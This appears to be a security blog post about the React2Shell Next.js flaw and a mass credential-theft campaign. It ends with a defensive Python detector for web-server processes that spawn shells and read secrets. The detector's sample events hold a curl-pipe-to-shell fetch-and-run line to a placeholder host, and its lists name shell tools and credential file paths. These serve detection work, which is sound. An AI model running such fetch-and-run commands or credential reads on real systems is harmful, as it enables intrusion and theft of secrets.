👤 KERNELWATCHER
🗓️ 07 Apr 2026  

React2Shell: How a Zero-Click Next.js Flaw Fueled a 24-Hour Credential Heist

In under a day, cybercriminals used a Next.js vulnerability to loot hundreds of servers - leaving a wake of exposed secrets, cloud keys, and payment data.

It started quietly: a hacker’s scanner pinged an unassuming web app built on Next.js. Minutes later, a sophisticated script was tunneling deep into the server’s memory, siphoning off secrets with surgical precision. By the time most defenders woke up, at least 766 hosts across the globe had already been compromised - victims of a new, mass-scale campaign exploiting the so-called React2Shell vulnerability. The operation, tracked as UAT-10608, is a stark reminder that in the cloud era, a single bug can open the floodgates for industrialized cybercrime.

Inside the React2Shell Breach: Anatomy of a Lightning-Fast Attack

The breach hinges on a flaw with a perfect 10.0 CVSS score: CVE-2025-55182, better known as React2Shell. This vulnerability lurks in React Server Components, a foundational part of Next.js, and allows attackers to execute arbitrary code on a server before any authentication checks - a “zero-click” gateway for hackers.

Armed with mass-internet scanning tools like Shodan and Censys, threat group UAT-10608 swept the web for exposed Next.js applications. Once a vulnerable target was found, the attackers sent a booby-trapped data payload directly to a server endpoint. The flaw? Next.js would unwittingly deserialize this data, letting the attackers’ code run freely inside the Node.js process.

From there, automation took over. A lightweight dropper fetched a multi-phase shell script, which quietly harvested a treasure trove of secrets: everything from environment variables and SSH keys to cloud tokens, Docker configs, and even payment platform credentials. Each phase’s loot was logged and uploaded to NEXUS Listener - a custom, password-protected backend where attackers could browse stolen data by victim, credential type, or attack stage.

Data from an exposed NEXUS Listener instance revealed the scale: over 10,000 files exfiltrated, affecting organizations across industries and geographies. The exposed information wasn’t just valuable for immediate theft (like database access or payment fraud); it also mapped out victims’ infrastructure for future attacks, lateral movement, or resale to other cybercriminals. Particularly dangerous was the leak of SSH keys - long-lived credentials that, if reused, could enable persistent, stealthy access even after the initial breach is discovered.

Investigators warn that the campaign’s automation and “spray-and-pray” tactics mean no cloud or web team can assume safety. The only defense: patching all vulnerable Next.js and React Server Component deployments, rotating stolen secrets, and auditing for suspicious access. With the campaign still unfolding, the clock is ticking for organizations to close this gaping hole before the next wave hits.
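The "auditing for suspicious access" step above is easier to act on with a concrete rule. The script below is an added example written for this article, not tooling from the investigators or from the Next.js project: it scans process-execution and file-open events of the kind a host sensor or auditd would emit and flags the two behaviours the article describes, a Node.js web process spawning a shell or download tool (the dropper stage), and any process in that spawned chain reading secret stores such as SSH keys, `.env` files, Docker or cloud credential files. The event line format, the tool and process names, the secret-file paths and the sample events are all constructed for the example; the `example.invalid` host is a placeholder, not an indicator from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Process names of a Next.js/Node.js server (assumption for this example).
WEB_PROCESSES = {"node", "next-server"}
# Tools a web worker has no business spawning; a match marks a dropper stage.
DROPPER_TOOLS = {"sh", "bash", "dash", "curl", "wget"}
# Files holding the kinds of secrets the article says were harvested.
SECRET_PATH_PATTERNS = [
    re.compile(r"/\.ssh/"),                 # SSH private keys
    re.compile(r"/\.env(\.|$)"),            # environment files (.env, .env.local)
    re.compile(r"/\.docker/config\.json$"), # Docker registry credentials
    re.compile(r"/\.aws/credentials$"),     # cloud credentials
]


@dataclass
class Event:
    ts: str
    kind: str    # "exec" (process started) or "open" (file opened)
    pid: int
    ppid: int
    comm: str    # short process name
    detail: str  # argv for exec events, file path for open events


def parse_event(line: str) -> Event:
    """Parse one constructed event line: ts kind pid ppid comm detail..."""
    parts = line.split(maxsplit=5)
    if len(parts) < 6:
        raise ValueError(f"malformed event line: {line!r}")
    ts, kind, pid, ppid, comm, detail = parts
    return Event(ts, kind, int(pid), int(ppid), comm, detail)


class Detector:
    def __init__(self) -> None:
        self.procs: Dict[int, Tuple[int, str]] = {}  # pid -> (ppid, comm)
        self.suspicious: Set[int] = set()            # pids of flagged dropper tools
        self.alerts: List[str] = []

    def _web_ancestor(self, pid: int) -> Optional[int]:
        """Walk the parent chain; return the first web-server pid, if any."""
        seen: Set[int] = set()
        while pid in self.procs and pid not in seen:
            seen.add(pid)
            ppid, comm = self.procs[pid]
            if comm in WEB_PROCESSES:
                return pid
            pid = ppid
        return None

    def _tainted(self, pid: int) -> bool:
        """True if pid or any ancestor was flagged as a dropper-stage process."""
        seen: Set[int] = set()
        while pid in self.procs and pid not in seen:
            if pid in self.suspicious:
                return True
            seen.add(pid)
            pid = self.procs[pid][0]
        return False

    def process(self, ev: Event) -> None:
        if ev.kind == "exec":
            self.procs[ev.pid] = (ev.ppid, ev.comm)
            if ev.comm in DROPPER_TOOLS:
                web = self._web_ancestor(ev.ppid)
                if web is not None:
                    self.suspicious.add(ev.pid)
                    self.alerts.append(
                        f"{ev.ts} web process {web} spawned {ev.comm} "
                        f"(pid {ev.pid}): {ev.detail}")
        elif ev.kind == "open":
            self.procs.setdefault(ev.pid, (ev.ppid, ev.comm))
            # A legitimate worker reading .env is normal; only reads from a
            # chain that started with a spawned tool are reported.
            if self._tainted(ev.pid) and any(
                    p.search(ev.detail) for p in SECRET_PATH_PATTERNS):
                self.alerts.append(
                    f"{ev.ts} suspicious pid {ev.pid} ({ev.comm}) "
                    f"read secret store {ev.detail}")


def analyze(lines: List[str]) -> List[str]:
    """Run the detector over event lines and return the alerts in order."""
    det = Detector()
    for line in lines:
        if line.strip():
            det.process(parse_event(line))
    return det.alerts


# Constructed sample events: a node server spawns sh, which fetches a script
# and reads secrets; a legitimate node worker reading .env is left alone.
SAMPLE_EVENTS = [
    "2026-04-07T03:12:01Z exec 4120 1 node /usr/bin/node server.js",
    "2026-04-07T03:12:44Z exec 4133 4120 sh /bin/sh -c curl -s http://example.invalid/s.sh | sh",
    "2026-04-07T03:12:45Z exec 4134 4133 curl curl -s http://example.invalid/s.sh",
    "2026-04-07T03:12:50Z open 4133 4120 sh /home/app/.ssh/id_rsa",
    "2026-04-07T03:12:51Z open 4133 4120 sh /home/app/.env",
    "2026-04-07T03:13:00Z exec 4140 1 sshd /usr/sbin/sshd",
    "2026-04-07T03:13:02Z open 4140 1 sshd /etc/ssh/sshd_config",
    "2026-04-07T03:13:10Z exec 4150 4120 node /usr/bin/node worker.js",
    "2026-04-07T03:13:11Z open 4150 4120 node /home/app/.env",
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Two design choices matter in practice: the secret-read rule is scoped to processes descended from a flagged spawn, so ordinary application reads of `.env` do not generate noise, and ancestry is walked through the recorded parent chain rather than checked one level up, so a tool launched via an intermediate shell is still attributed to the web process.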

Conclusion

The React2Shell breach is a case study in how software supply chain flaws and automation have supercharged cybercrime. As attackers move faster and cast wider nets, even small configuration mistakes or slow patching can have devastating, cascading consequences. In the aftermath, one lesson is clear: in today’s threat landscape, every unpatched server is a ticking time bomb.

WIKICROOK

  • Remote Code Execution (RCE): An attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
  • Deserialization: Deserialization converts stored or transmitted data back into usable program objects. If attacker-controlled data is deserialized without safeguards, it can let attackers inject harmful instructions into applications.
  • SSH Key: An SSH key is a digital credential that enables secure, passwordless access to remote servers. If compromised, it can allow unauthorized system access for as long as the key remains valid.
  • Environment Variable: An environment variable is a key-value pair storing configuration data, often used to hold secrets such as API keys so they are kept out of source code; anything that can read the process’s environment can read those secrets.
  • C2 (Command and Control): Infrastructure used by attackers to remotely manage, control, and communicate with malware on compromised devices.

KERNELWATCHER
Linux Kernel Security Analyst